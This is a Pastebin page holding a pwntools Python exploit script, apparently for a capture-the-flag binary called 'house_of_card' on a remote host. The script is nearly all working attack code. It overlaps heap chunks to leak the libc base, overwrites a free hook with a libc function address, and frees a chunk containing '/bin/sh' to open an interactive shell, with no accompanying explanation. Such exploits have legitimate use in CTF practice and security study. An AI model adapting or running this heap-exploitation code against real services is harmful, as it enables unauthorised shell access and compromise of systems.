API tools faq
paste
Guest User

Untitled

a guest
Jul 15th, 2018
98
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.23 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/env python
  2. from pwn import *
  3.  
  4. context(terminal=['tmux', 'splitw', '-h']) # horizontal split window
  5. # context(terminal=['tmux', 'new-window']) # open new window
  6.  
  7. # libc = ELF('./libc.so')
  8. elf = ELF('./house_of_card')
  9. context(os='linux', arch=elf.arch)
  10.  
  11. RHOST = "178.128.87.12"
  12. RPORT = 31336
  13. LHOST = "127.0.0.1"
  14. LPORT = 31336
  15.  
  16. def section_addr(name, elf=elf):
  17. return elf.get_section_by_name(name).header['sh_addr']
  18.  
  19. def dbg(ss):
  20. log.info("%s: 0x%x" % (ss, eval(ss)))
  21.  
  22. conn = None
  23. opt = sys.argv.pop(1) if len(sys.argv) > 1 else '?' # pop option
  24. if opt in 'rl':
  25. conn = remote(*{'r': (RHOST, RPORT), 'l': (LHOST, LPORT)}[opt])
  26. elif opt == 'd':
  27. gdbscript = """
  28.  
  29. continue
  30. """.format(hex(elf.symbols['main'] if 'main' in elf.symbols.keys() else elf.entrypoint))
  31. conn = gdb.debug(['./house_of_card'], gdbscript=gdbscript)
  32. else:
  33. conn = process(['./house_of_card'])
  34. # conn = process(['./house_of_card'], env={'LD_PRELOAD': './libc.so'})
  35. if opt == 'a': gdb.attach(conn)
  36.  
  37. def add(name, size, desc):
  38. conn.sendlineafter('4. Quit', '1')
  39. conn.sendafter('Name :', name)
  40. conn.sendlineafter('Len?', str(size))
  41. conn.sendafter('Description:', desc)
  42.  
  43. def edit(idx, name, size, desc):
  44. conn.sendlineafter('4. Quit', '2')
  45. conn.sendlineafter('Back.', str(idx))
  46. conn.sendafter('name?', name)
  47. conn.sendlineafter('Len?', str(size))
  48. conn.send(desc)
  49.  
  50. def delete(idx):
  51. conn.sendlineafter('4. Quit', '3')
  52. conn.sendlineafter('Back.', str(idx))
  53.  
  54. # exploit
  55. log.info('Pwning')
  56.  
  57. # overlap chunks for addless leak
  58. add('hogehoge\n', 0x80, 'y'*0x10+'\n')
  59. add('fugafuga\n', 0x80, 'y'*0x10+'\n')
  60. add('piyopiyo\n', 0x80, 'y'*0x10+'\n')
  61. add('bohebohe\n', 0x80, 'y'*0x10+'\n')
  62. edit(1, 'hogehoge'*2+'\n', 0x80+0x80, 'ffffff\n')
  63. edit(1, '/bin/sh\x00\n', 0x80+0x81, 'f'*0xf4 + p64(0xdeadbeef)*4 + p64(0xd0*2+1)+'\n')
  64. delete(2)
  65. add('fugafuga\n', 0xd0-8, 'y'*0x10+'\n')
  66. conn.sendlineafter('4. Quit', '2')
  67. conn.recvuntil('[2] Name : ')
  68. libc_base = u64(conn.recv(6)+'\x00\x00') - 0x3c1c18
  69. dbg('libc_base')
  70. conn.sendline('5')
  71.  
  72. # overwrite __free_note
  73. add('bohebohe\n', 0x80, 'a'*0x10+'\n')
  74. edit(5, 'bohebohe\n', 0x81, 'a'*0x8c +p64(libc_base+0x3c3788)+'\n')
  75. edit(5, p64(libc_base + 0x456a0) +'\n', 0x80, 'hgoe\n')
  76. delete(1)
  77. conn.interactive()
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!